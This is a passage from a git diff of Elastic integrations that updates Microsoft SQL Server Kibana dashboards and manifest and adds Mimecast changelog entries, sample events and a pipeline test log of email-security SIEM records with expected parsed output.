], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwMiwxXQ==", "attributes": { "description": "Microsoft SQL Server Audit Events", "hits": 0, @@ -40,6 +51,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "842e1cfc-7341-462d-8949-eef99e130666", + "w": 18, + "x": 0, + "y": 0 + }, + "panelIndex": "842e1cfc-7341-462d-8949-eef99e130666", "embeddableConfig": { "attributes": { "references": [ @@ -61,7 +82,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "b51d3b6d-d5e8-4631-b11c-81dcb81734a8": { "columnOrder": [ @@ -131,16 +152,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "70000b7b-124a-439e-8ef2-6a8dad15c166" - ], "layerId": "b51d3b6d-d5e8-4631-b11c-81dcb81734a8", "layerType": "data", "legendDisplay": "default", "legendSize": "auto", - "metric": "a6937f39-2999-4be2-8371-619b5bf2fb67", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "70000b7b-124a-439e-8ef2-6a8dad15c166" + ], + "metrics": [ + "a6937f39-2999-4be2-8371-619b5bf2fb67" + ] } ], "shape": "donut" @@ -158,19 +181,19 @@ }, "type": "lens" }, + "title": "Microsoft SQL Server Event Types" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "842e1cfc-7341-462d-8949-eef99e130666", - "w": 18, - "x": 0, + "i": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", + "w": 17, + "x": 18, "y": 0 }, - "panelIndex": "842e1cfc-7341-462d-8949-eef99e130666", - "title": "Microsoft SQL Server Event Types", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", "embeddableConfig": { "attributes": { "references": [ @@ -192,7 +215,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "7af1e8e7-5f23-4195-b8e1-94f90b0a840a": { "columnOrder": [ @@ -311,19 +334,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Rate of events" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", - "w": 17, - "x": 18, + "i": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", + "w": 13, + "x": 35, "y": 0 }, - "panelIndex": "d2bbfd00-6448-4207-9aef-b5bfcb8f978b", - "title": "Rate of events", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", "embeddableConfig": { "attributes": { "references": [ @@ -345,7 +368,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "7af1e8e7-5f23-4195-b8e1-94f90b0a840a": { "columnOrder": [ @@ -476,19 +499,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Rate of Failed Logins" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 13, - "i": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", + "h": 9, + "i": "9df96bf5-959d-470c-afaa-f85cd3921d41", "w": 13, - "x": 35, - "y": 0 + "x": 0, + "y": 13 }, - "panelIndex": "e0dde78f-31ea-478a-b2d2-7bde0fd3eedb", - "title": "Rate of Failed Logins", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "9df96bf5-959d-470c-afaa-f85cd3921d41", "embeddableConfig": { "attributes": { "references": [ @@ -520,7 +543,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "43db16e8-42fc-4bf0-b02a-67ed2d5e9ebd": { "columnOrder": [ @@ -728,19 +751,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Database Principal Changes" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 9, - "i": "9df96bf5-959d-470c-afaa-f85cd3921d41", + "i": "c95238d4-553e-424f-9880-7377837f0ba2", "w": 13, - "x": 0, + "x": 13, "y": 13 }, - "panelIndex": "9df96bf5-959d-470c-afaa-f85cd3921d41", - "title": "Database Principal Changes", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "c95238d4-553e-424f-9880-7377837f0ba2", "embeddableConfig": { "attributes": { "references": [ @@ -772,7 +795,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "43db16e8-42fc-4bf0-b02a-67ed2d5e9ebd": { "columnOrder": [ @@ -963,19 +986,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Role Member Changes" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 9, - "i": "c95238d4-553e-424f-9880-7377837f0ba2", + "i": "c48ea73e-2a8d-41bf-831c-275c516ee481", "w": 13, - "x": 13, + "x": 26, "y": 13 }, - "panelIndex": "c95238d4-553e-424f-9880-7377837f0ba2", - "title": "Role Member Changes", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "c48ea73e-2a8d-41bf-831c-275c516ee481", "embeddableConfig": { "attributes": { "references": [ @@ -1007,7 +1030,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "43db16e8-42fc-4bf0-b02a-67ed2d5e9ebd": { "columnOrder": [ @@ -1230,19 +1253,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Audit Changes" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 9, - "i": "c48ea73e-2a8d-41bf-831c-275c516ee481", - "w": 13, - "x": 26, + "i": "c68c4401-b3a5-486a-8e66-da4bad6b035d", + "w": 9, + "x": 39, "y": 13 }, - "panelIndex": "c48ea73e-2a8d-41bf-831c-275c516ee481", - "title": "Audit Changes", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "c68c4401-b3a5-486a-8e66-da4bad6b035d", "embeddableConfig": { "attributes": { "references": [ @@ -1269,7 +1292,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "03553b27-f941-4b4b-bcb6-8e1943c154f3": { "columnOrder": [ @@ -1348,34 +1371,19 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false, "type": "lens" }, - "gridData": { - "h": 9, - "i": "c68c4401-b3a5-486a-8e66-da4bad6b035d", - "w": 9, - "x": 39, - "y": 13 - }, - "panelIndex": "c68c4401-b3a5-486a-8e66-da4bad6b035d", - "title": "Number of Failed Logins", - "type": "lens", - "version": "8.4.0" + "title": "Number of Failed Logins" } ], "timeRestore": false, "title": "[Logs Microsoft SQL Server Audit Events] Overview", "version": 1 }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-361588b0-389b-11ec-9973-85eff9a74fdb", - "migrationVersion": { - "dashboard": "8.4.0" - }, "references": [ { "id": "logs-*", @@ -1523,5 +1531,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json index aeb63459627..5b31b58c912 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwMywxXQ==", "attributes": { "description": "Error Logs of Microsoft SQL server overview", "hits": 0, @@ -19,7 +30,51 @@ "panelsJSON": [ { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "microsoft_sqlserver.log.origin", + "message", + "event.original" + ], + "description": "Microsoft SQL server Error Log", + "grid": { + "columns": { + "log.level": { + "width": 119 + }, + "message": { + "width": 336.33333333333337 + }, + "microsoft_sqlserver.log.origin": { + "width": 218.33333333333331 + } + } + }, + "hideChart": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"data_stream.dataset\",\"negate\":false,\"params\":{\"query\":\"microsoft_sqlserver.log\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"microsoft_sqlserver.log\"}}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"\"}}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Microsoft SQL server Error Log", + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 25, @@ -29,11 +84,20 @@ "y": 12 }, "panelIndex": "acfd02ea-6f4d-4582-8a3e-8a43d3461128", - "panelRefName": "panel_acfd02ea-6f4d-4582-8a3e-8a43d3461128", "type": "search", - "version": "8.3.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", "embeddableConfig": { "attributes": { "references": [ @@ -45,7 +109,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "056140ff-8a51-44be-9c14-76e4418d0587": { "columnOrder": [ @@ -159,39 +223,31 @@ "enhancements": {}, "type": "lens" }, - "gridData": { - "h": 12, - "i": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f", - "title": "Microsoft SQL server Error Log origin", - "type": "lens", - "version": "8.4.0" + "title": "Microsoft SQL server Error Log origin" } ], "timeRestore": false, "title": "[Logs Microsoft SQL Server] Error Log Overview", "version": 1 }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-62b48570-fdf7-11ec-882e-ddefea6aeea3", - "migrationVersion": { - "dashboard": "8.4.0" - }, "references": [ - { - "id": "microsoft_sqlserver-a8a63940-fdfa-11ec-882e-ddefea6aeea3", - "name": "acfd02ea-6f4d-4582-8a3e-8a43d3461128:panel_acfd02ea-6f4d-4582-8a3e-8a43d3461128", - "type": "search" - }, { "id": "logs-*", "name": "e59207ef-b7f3-4af0-bfa0-b69e1eb4007f:indexpattern-datasource-layer-056140ff-8a51-44be-9c14-76e4418d0587", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "acfd02ea-6f4d-4582-8a3e-8a43d3461128:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "acfd02ea-6f4d-4582-8a3e-8a43d3461128:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json index faa45de9977..348df575b01 100644 --- a/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json +++ b/packages/microsoft_sqlserver/kibana/dashboard/microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411.json @@ -1,4 +1,15 @@ { + "id": "microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:21:22.589Z", + "created_at": "2024-01-22T13:21:22.589Z", + "version": "WzEwNCwxXQ==", "attributes": { "description": "A dashboard with key metrics about a Microsoft SQL Server instance performance", "hits": 0, @@ -18,6 +29,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "733a1dbb-abdd-45d9-a908-026db7545a29", + "w": 24, + "x": 0, + "y": 0 + }, + "panelIndex": "733a1dbb-abdd-45d9-a908-026db7545a29", "embeddableConfig": { "attributes": { "references": [ @@ -29,7 +50,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c298fa42-a98b-441a-8fc4-7e829887f213": { "columnOrder": [ @@ -123,19 +144,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "User Connections [Metrics Microsoft SqlServer]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "733a1dbb-abdd-45d9-a908-026db7545a29", + "i": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", "w": 24, - "x": 0, + "x": 24, "y": 0 }, - "panelIndex": "733a1dbb-abdd-45d9-a908-026db7545a29", - "title": "User Connections [Metrics Microsoft SqlServer]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", "embeddableConfig": { "attributes": { "references": [ @@ -147,7 +168,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "1ef8ef96-34a6-4ed3-915c-44e3f187e683": { "columnOrder": [ @@ -239,19 +260,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Batch Requests/sec [Microsoft SQL Server]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", + "i": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", "w": 24, - "x": 24, - "y": 0 + "x": 0, + "y": 15 }, - "panelIndex": "eeb38cf1-3e35-4a16-b910-21ef1aca2142", - "title": "Batch Requests/sec [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", "embeddableConfig": { "attributes": { "references": [ @@ -263,7 +284,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "f37f21be-12f6-4e30-b8e4-de8e37889cc6": { "columnOrder": [ @@ -357,19 +378,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Lock Waits/sec [Microsoft SQL Server]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", + "i": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", "w": 24, - "x": 0, + "x": 24, "y": 15 }, - "panelIndex": "9537c5f9-fdeb-4101-a50c-419834b6bdc3", - "title": "Lock Waits/sec [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", "embeddableConfig": { "attributes": { "references": [ @@ -381,7 +402,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c804f10c-9dee-4bc5-b3ca-2a4b900f925d": { "columnOrder": [ @@ -475,19 +496,19 @@ "hidePanelTitles": false, "type": "lens" }, + "title": "Buffer Cache Hit Ratio [Microsoft SQL Server]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", + "i": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", "w": 24, - "x": 24, - "y": 15 + "x": 0, + "y": 30 }, - "panelIndex": "3ceec42f-23d1-4ca2-8d59-c14ad798850f", - "title": "Buffer Cache Hit Ratio [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" - }, - { + "panelIndex": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", "embeddableConfig": { "attributes": { "references": [ @@ -499,7 +520,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "3619ed84-0368-47cc-aa48-6edc35465d9c": { "columnOrder": [ @@ -593,28 +614,13 @@ "hidePanelTitles": false, "type": "lens" }, - "gridData": { - "h": 15, - "i": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", - "w": 24, - "x": 0, - "y": 30 - }, - "panelIndex": "1b64a2ab-638e-483a-826d-c2a8563b7fcf", - "title": "Transactions [Microsoft SQL Server]", - "type": "lens", - "version": "8.4.0" + "title": "Transactions [Microsoft SQL Server]" } ], "timeRestore": false, "title": "[Metrics Microsoft SQL Server] Performance", "version": 1 }, - "coreMigrationVersion": "8.4.0", - "id": "microsoft_sqlserver-a2ead240-18bb-11e9-9836-f37dedd3b411", - "migrationVersion": { - "dashboard": "8.4.0" - }, "references": [ { "id": "metrics-*", @@ -642,5 +648,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/microsoft_sqlserver/manifest.yml b/packages/microsoft_sqlserver/manifest.yml index 7c53f4a8839..927f1e11c02 100644 --- a/packages/microsoft_sqlserver/manifest.yml +++ b/packages/microsoft_sqlserver/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_sqlserver title: "Microsoft SQL Server" -version: "2.4.0" +version: "2.5.0" description: Collect events from Microsoft SQL Server with Elastic Agent type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.10.2" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -63,6 +63,7 @@ policy_templates: required: true show_user: true default: verysecurepassword + secret: true description: "Use URL encoding for passwords with special characters" - name: username type: text diff --git a/packages/mimecast/changelog.yml b/packages/mimecast/changelog.yml index 497a8643329..9feaa59e016 100644 --- a/packages/mimecast/changelog.yml +++ b/packages/mimecast/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.24.0" + changes: + - description: Log processing stage and improve document fingerprinting. + type: enhancement + link: https://github.com/elastic/integrations/pull/9078 +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.22.1" changes: - description: Changed owners diff --git a/packages/mimecast/data_stream/archive_search_logs/sample_event.json b/packages/mimecast/data_stream/archive_search_logs/sample_event.json index 4fe4c38d936..331466d21e5 100644 --- a/packages/mimecast/data_stream/archive_search_logs/sample_event.json +++ b/packages/mimecast/data_stream/archive_search_logs/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-03-18T18:35:49.000Z", "agent": { - "ephemeral_id": "ef42d9ea-67ec-4494-bad4-9d47b9ed68d2", - "id": "f81bb806-77be-4e89-9f08-d426b37fd611", + "ephemeral_id": "33b422bb-ff57-4039-80c8-23c64e5f54d7", + "id": "5e5700e6-bb04-40f9-b6fc-e5adb94ec6b5", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.12.1" }, "data_stream": { "dataset": "mimecast.archive_search_logs", @@ -59,4 +59,4 @@ "email": "admin_dhamilton@hapi1.hamilton321.net", "name": "admin_dhamilton" } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/audit_events/sample_event.json b/packages/mimecast/data_stream/audit_events/sample_event.json index 0bb1d5bdf95..33b75ad97fd 100644 --- a/packages/mimecast/data_stream/audit_events/sample_event.json +++ b/packages/mimecast/data_stream/audit_events/sample_event.json @@ -52,4 +52,4 @@ "email": "johndoe@example.com", "name": "johndoe" } -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/dlp_logs/sample_event.json b/packages/mimecast/data_stream/dlp_logs/sample_event.json index 01335099301..8a938af34f2 100644 --- a/packages/mimecast/data_stream/dlp_logs/sample_event.json +++ b/packages/mimecast/data_stream/dlp_logs/sample_event.json @@ -54,4 +54,4 @@ "forwarded", "mimecast-dlp-logs" ] -} +} \ No newline at end of file diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log new file mode 100644 index 00000000000..7494f072312 --- /dev/null +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log @@ -0,0 +1,11 @@ +{"Act":"Acc","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","Dir":"Internal","IP":"81.2.69.144","MsgId":"","Rcpt":"auser@mimecast.com","Sender":"from@mimecast.com","SpamInfo":"[]","SpamLimit":0,"SpamProcessingDetail":{"spf":{"info":"SPF_FAIL","allow":true},"dkim":{"info":"DKIM_UNKNOWN","allow":true}},"SpamScore":1,"Subject":"message subject","TlsVer":"TLSv1","aCode":"7O7I7MvGP1mj8plHRDuHEA","acc":"C0A0","datetime":"2017-05-26T16:47:41+0100","headerFrom":"from@mimecast.com"} +{"Act":"Acc","AttCnt":2,"AttNames":"\"filename.docx\", \"filename2.xlsx\"","AttSize":1267,"MsgId":"messageId@mssageId","MsgSize":2116,"aCode":"BY81J52RPjSmp7MrubnlZg","acc":"C0A0","datetime":"2017-05-26T19:36:48+0100"} +{"Act":"Acc","AttCnt":0,"AttNames":"","AttSize":0,"MsgId":"messageId@mssageId","MsgSize":2116,"aCode":"BY81J52RPjSmp7MrubnlZg","acc":"C0A0","datetime":"2017-05-26T19:36:48+0100"} +{"Act":"Hld","AttCnt":0,"AttNames":"","AttSize":0,"Hld":"Spm","IPInternalName":"false","IPNewDomain":"false","IPReplyMismatch":"false","IPSimilarDomain":"false","IPThreadDict":"false","MsgId":"messageId@mssageId","MsgSize":56442,"aCode":"015vTYvNN-Wn30v7M5MzNw","acc":"C0A0","datetime":"2017-05-26T19:24:18+0100"} +{"AttCnt":0,"AttSize":0,"Attempt":1,"Cphr":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","Delivered":true,"Dir":"Inbound","IP":"81.2.69.144","Latency":5618,"MsgId":"messageId@mssageId","Rcpt":"auser@mimecast.com","ReceiptAck":"250 2.6.0 messageId@mssageId [InternalId=25473608] Queued mail for delivery","Route":"Mimecast Exchange Rout","Sender":"from@domain.com","Snt":28237,"Subject":"Auto Reply","TlsVer":"TLSv1","UseTls":"Yes","aCode":"9q_HeIHHPYejZTBsnipWmQ","acc":"C0A0","datetime":"2017-05-26T19:40:33+0100"} +{"CustomerIP":"true","IP":"0.0.0.0","MimecastIP":"false","MsgId":"<85485.121030516250700527@mta.uk.somewhere.tld>","Recipient":"recipient@recipientdomain.tld","Route":"Inbound","Sender":"8jy0xzfjymioyjfjrajc@senderdomain.tld","SenderDomain":"senderdomain.tld","SenderDomainInternal":"false","Size":1648832,"Subject":"Invoice Attached for payment","Virus":"Anomali:Phishing","acc":"C0A0","datetime":"2021-03-05T16:25:17+0000","fileExt":"xlsm","fileMime":"application/vnd.ms-excel.sheet.macroEnabled.12","fileName":"Invoice Attached for payment","md5":"4dbe9dbfb53438d9ce410535355cd973","sha1":"816b013c8be6e5708690645964b5d442c085041e","sha256":"efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12"} +{"MsgId":"","Recipient":"recipient@adomain.tld","Route":"Inbound","Sender":"sender@domain.tld","SenderDomain":"bdomain.tld","SourceIP":"0.0.0.0","Subject":"Opportunity to become VP","aCode":"azYwczFKNga_v1sYBuJOvA","acc":"C0A0","datetime":"2021-03-05T18:18:39+0000","headerFrom":"sender@adomain"} +{"MsgId":"","Recipient":"recipient@domain.tld","Route":"Internal","ScanResultInfo":"Blocked URL Category","Sender":"sender@domain.tld","Subject":"Coffee Briefing","URL":"https://domain.com/login/","UrlCategory":"Phishing & Fraud","aCode":"vit87EEXMPaEyl22Lrb92A","acc":"C46A75","datetime":"2021-03-04T21:31:08+0000"} +{"Action":"Hold","CustomName":"false","CustomThreatDictionary":"false","Definition":"Default Impersonation Definition","Hits":"1","IP":"0.0.0.0","InternalName":"true","MsgId":"","NewDomain":"false","Recipient":"recipient@domain","ReplyMismatch":"false","Route":"Inbound","Sender":"sender@domain","SimilarCustomExternalDomain":"false","SimilarInternalDomain":"false","SimilarMimecastExternalDomain":"false","Subject":"Opportunity to become VP","TaggedExternal":"false","TaggedMalicious":"true","ThreatDictionary":"false","aCode":"q4qBpkoTOt-iStR7G44w3g","acc":"C0A0","datetime":"2020-07-27T00:39:59+0100"} +{"acc":"C0A0","datetime":"2017-05-26T19:22:37+0100","reason":"malicious","recipient":"auser@mimecast.com","route":"inbound","sender":"from@domain.com","senderDomain":"domain.com","sourceIp":"81.2.69.144","url":"http://bgmtechnology.com.au","urlCategory":"Blocked"} +{"IP":"81.2.69.144","Recipient":"auser@mimecast.com","Route":"Inbound","Sender":"from@domain.com","SenderDomain":"domain.com","Size":378368,"acc":"C1A1","datetime":"2017-05-23T21:45:21+0100","fileExt":"doc","fileMime":"application/vnd.ms-office","fileName":"1XCOLUMN.PVC","md5":"7b52770644da336a9a59141c80807f37","sha1":"a27850da9e7adfc8e1a94dabf2509fc9d65ee7e2","sha256":"8746bb4b31ab6f03eb0a3b2c62ab7497658f0f85c8e7e82f042f9af0bb876d83"} diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log-expected.json new file mode 100644 index 00000000000..5a6cb131f62 --- /dev/null +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-docs-logs.log-expected.json @@ -0,0 +1,535 @@ +{ + "expected": [ + { + "@timestamp": "2017-05-26T15:47:41.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "direction": "internal", + "from": { + "address": [ + "from@mimecast.com" + ] + }, + "local_id": "7O7I7MvGP1mj8plHRDuHEA", + "message_id": "", + "subject": "message subject", + "to": { + "address": [ + "auser@mimecast.com" + ] + } + }, + "event": { + "action": "Acc", + "created": "2017-05-26T16:47:41+0100", + "original": "{\"Act\":\"Acc\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\",\"Dir\":\"Internal\",\"IP\":\"81.2.69.144\",\"MsgId\":\"\",\"Rcpt\":\"auser@mimecast.com\",\"Sender\":\"from@mimecast.com\",\"SpamInfo\":\"[]\",\"SpamLimit\":0,\"SpamProcessingDetail\":{\"spf\":{\"info\":\"SPF_FAIL\",\"allow\":true},\"dkim\":{\"info\":\"DKIM_UNKNOWN\",\"allow\":true}},\"SpamScore\":1,\"Subject\":\"message subject\",\"TlsVer\":\"TLSv1\",\"aCode\":\"7O7I7MvGP1mj8plHRDuHEA\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T16:47:41+0100\",\"headerFrom\":\"from@mimecast.com\"}", + "outcome": "unknown" + }, + "mimecast": { + "SpamInfo": "[]", + "SpamLimit": 0, + "SpamProcessingDetail": { + "dkim": { + "allow": true, + "info": "DKIM_UNKNOWN" + }, + "spf": { + "allow": true, + "info": "SPF_FAIL" + } + }, + "SpamScore": 1, + "acc": "C0A0", + "log_type": "receipt" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "tls": { + "cipher": "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "version": "TLSv1" + } + }, + { + "@timestamp": "2017-05-26T18:36:48.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "name": "\"filename.docx\", \"filename2.xlsx\"", + "size": 1267 + } + }, + "local_id": "BY81J52RPjSmp7MrubnlZg", + "message_id": "messageId@mssageId" + }, + "event": { + "action": "Acc", + "created": "2017-05-26T19:36:48+0100", + "original": "{\"Act\":\"Acc\",\"AttCnt\":2,\"AttNames\":\"\\\"filename.docx\\\", \\\"filename2.xlsx\\\"\",\"AttSize\":1267,\"MsgId\":\"messageId@mssageId\",\"MsgSize\":2116,\"aCode\":\"BY81J52RPjSmp7MrubnlZg\",\"acc\":\"C0A0\",\"datetime\":\"2017-05-26T19:36:48+0100\"}", + "outcome": "unknown" + }, + "mimecast": { + "AttCnt": 2, + "MsgSize": 2116, + "acc": "C0A0", + "log_type": "process" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2017-05-26T18:36:48.000Z", + "ecs": { + "version": "8.11.0" + }, + "email": { + "attachments": { + "file": { + "size": 0 + } + }, + "local_id": "BY81J52RPjSmp7MrubnlZg", + "message_id": "messageId@mssageId" + }, + "event": { + "action": "Acc", + "created": "2017-05-26T19:36:48+0100", + "original": 